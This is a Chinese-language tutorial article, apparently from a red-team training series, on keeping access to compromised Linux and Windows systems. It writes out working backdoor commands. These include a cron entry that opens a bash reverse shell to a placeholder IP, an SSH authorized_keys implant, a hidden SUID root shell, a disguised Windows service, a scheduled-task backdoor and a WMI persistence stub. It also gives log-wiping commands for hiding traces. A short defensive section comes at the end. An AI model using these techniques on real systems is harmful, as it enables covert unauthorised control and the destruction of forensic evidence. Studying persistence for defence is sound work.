撤出之后如何“随时回来”?权限维持的5种姿势(第十一弹·权限维持篇)

发布时间:2026/7/17 22:18:52
撤出之后如何“随时回来”?权限维持的5种姿势(第十一弹·权限维持篇) 你辛辛苦苦拿下了域控结果第二天运维发现漏洞打了个补丁你的Webshell被删了、账号被禁了——一切归零。真相是没有权限维持的渗透等于“一次性参观券”。全文约2100字阅读约7分钟。今天教你如何在撤出之后还能“随时回来”。一、先讲一个真实故事一个计划任务“潜伏”了427天某大型企业的红蓝对抗演练中蓝队防守方花了整整14个月才把红队的所有后门清理干净。红队做了什么很简单——他们在第一台失陷的Linux服务器上写了一个每72小时执行一次的cron计划任务。任务内容是从一个隐蔽的GitHub仓库下载并执行一个反弹Shell脚本。蓝队清理了Webshell、修补了漏洞、重置了密码——但漏掉了这个cron任务。14个月后在一次季度巡检中才偶然发现。而这14个月里红队随时可以“复活”。这就是权限维持的威力你不需要永远在线只要留一把“后门钥匙”想什么时候回来就什么时候回来。二、权限维持到底是什么说人话官方定义权限维持Persistence是指攻击者在成功获取系统访问权限后采取一系列技术手段确保其能够在后续任意时间点重新获得对目标系统的控制权即使在系统重启、补丁更新或账户密码变更后仍能保持访问能力。说人话就是一句话给自己留一把“万能钥匙”随时能再进来。想象一下你是一个小偷撬开了银行金库的门拿到了权限。但你不可能一直待在金库里——你要撤走。撤走之前你在金库的通风管道里藏了一把备用钥匙后门。下次你想来的时候不用再撬门直接掏钥匙进来就行。有权限维持你是“业主”没有权限维持你是“游客”。三、Linux权限维持7种姿势从入门到“隐形” 姿势一计划任务后门Cron——最经典、最稳定原理利用Linux的cron定时任务定期执行恶意脚本。一句话后门bashecho */10 * * * * root /bin/bash -c bash -i /dev/tcp/你的IP/端口 01 /etc/crontab每10分钟反弹一次Shell你随时都能连回来。 高级玩法把脚本存在/dev/shm/内存目录重启就消失但cron任务还在脚本没了会自动重新下载。 姿势二SSH免密登录——最“合法”的后门原理把自己的公钥写入目标服务器的~/.ssh/authorized_keys。bashecho ssh-rsa AAAAB3NzaC1yc2EAAA... ~/.ssh/authorized_keys运维查日志只能看到“正常SSH登录”——完全合法无法察觉。 高级玩法不只留~/.ssh/authorized_keys还要留一条SSH连接复用——~/.ssh/config里配置ControlMaster即使换了公钥也能复用已建立的连接。 姿势三SUID后门——“合法程序”藏玄机原理给一个常见系统命令如find设置SUID位让它执行时拥有root权限。bashcp /bin/bash /bin/.hidden_bash chmod 4755 /bin/.hidden_bash运行时/bin/.hidden_bash -p→直接获得root shell。运维看到的是“一个系统进程在运行”根本不会起疑。 姿势四PAM后门——SSH登录直接“偷密码”原理修改PAM认证模块文件让SSH登录时把你的密码记录下来同时还能正常登录系统。这是顶级后门——你连系统都不用进去每次有人SSH登录密码就自动发到你的邮箱或日志文件里。 姿势五内核模块后门LKM——最隐蔽、最难查原理加载一个恶意内核模块LKM在内核层面隐藏进程、文件、网络连接。你开着后门netstat看不到、ps看不到、ls看不到——就好像“隐身”一样。防御方想查你必须重启系统或者拆机取证。 姿势六inotify后门——文件变化自动触发的潜伏者原理利用inotify机制监控文件变化一旦有文件变化就触发执行恶意代码。比如监控/etc/passwd——只要有人修改密码文件你就弹一个Shell。 姿势七日志清理与痕迹消除——后门的第一守护者核心命令history -c清当前记录unset HISTFILE禁止后续记录sed -i /可疑IP/d /var/log/auth.log删除登录日志。最后记得清理~/.bash_history让运维复查时什么都找不到。四、Windows权限维持5种姿势从入门到“影分身” 姿势一自启动项Startup Folder——最简单的“复活甲”原理把恶意程序放在“启动”文件夹用户每次登录都会自动执行。路径用户级C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\系统级C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\只要放一个exe进去每次开机自动上线。 姿势二注册表自启动——最经典的“开机自启”原理在注册表的特定键值下写入恶意程序路径。三个最常用的位置textHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceRun和RunOnce的区别Run是每次开机都运行RunOnce是只在下次重启时运行一次适合“一次性潜伏”场景。 姿势三Windows服务后门——最“正规”的伪装原理创建一个系统服务伪装成系统组件开机自动启动。用sc命令创建cmdsc create WindowsUpdateService binPath C:\Windows\Temp\backdoor.exe start auto运维在服务列表里看到的是一个叫“WindowsUpdate”的服务谁会怀疑 姿势四计划任务后门——最灵活的定时器原理和Linux的cron一样创建计划任务定期执行。cmdschtasks /create /tn 系统维护 /tr C:\Windows\Temp\backdoor.exe /sc daily /st 02:00每天凌晨2点执行你睡醒就有Shell。 姿势五WMIWindows Management Instrumentation后门——最隐蔽的“无文件攻击”原理通过WMI在系统里注册一个永久事件监听器不写文件、不写注册表、只在内存里运行。powershell# 创建永久WMI事件监听器 Register-WmiEvent -Query SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA Win32_ProcessStartup -Action { 反弹Shell代码 }杀毒软件扫不到、运维肉眼查不到、重启后自动恢复——只有内存取证才能发现。五、红队的“终极奥义”三层后门体系层级形式特点表层后门WebShell、自启动项容易被发现用于第一波进入中层后门计划任务、服务、注册表有一定隐蔽性清理需要一定技术深层后门LKM、PAM后门、WMI永久事件极难发现需要专业工具和深入分析高手从不只留一个后门——他们会留一套“后门体系”。你清理了WebShell表层我还有计划任务中层在10分钟后重建它你清理了计划任务中层我还有WMI深层在5分钟后重建计划任务。六、怎么防给防御方的3条核心建议① 基线监控对比系统服务的“黄金镜像”任何偏离基线的新增服务、任务、启动项都要告警。② 日志审计重点关注/var/log/auth.log和Windows安全日志4624、4672事件中的非正常时间登录行为。③ 终端检测与响应EDR现代EDR能检测内存中的恶意行为和异常进程链——传统杀毒软件防不住的后门EDR可以。七、学习资源包 推荐靶场VulnHub的FRISTILEAKS、Mr-Robot涉及多种权限维持手法以及TryHackMe的Persistence专项房间。 推荐阅读FreeBuf搜索“权限维持”标签大量实战案例以及《红队之道持久化访问技术手册》。️ 必装工具Linux下用chkrootkit/rkhunter检测后门Windows下用Autoruns、TCPView排查自启动。写在最后SQL注入是“进门”文件上传是“送武器”提权是“夺权”横向移动是“攻城略地”——权限维持是“修建永久工事”。没有权限维持你的一切努力都是“一次性”的。有了权限维持你的每一次渗透都在为下一次渗透积累“资本”。今天这篇文章我带你从Linux到Windows从表层后门到深层后门走了一遍。真正的渗透高手不是“能进来”而是“想什么时候进来就什么时候进来”。—— 手把手带你上路的网安教练下一期预告第十二弹·结束也是开始——《从0到1如何用6个月找到你的第一份网络安全工作》。这个系列到今天就暂时告一段落了最后一篇送你一份完整的求职实战地图记得来看。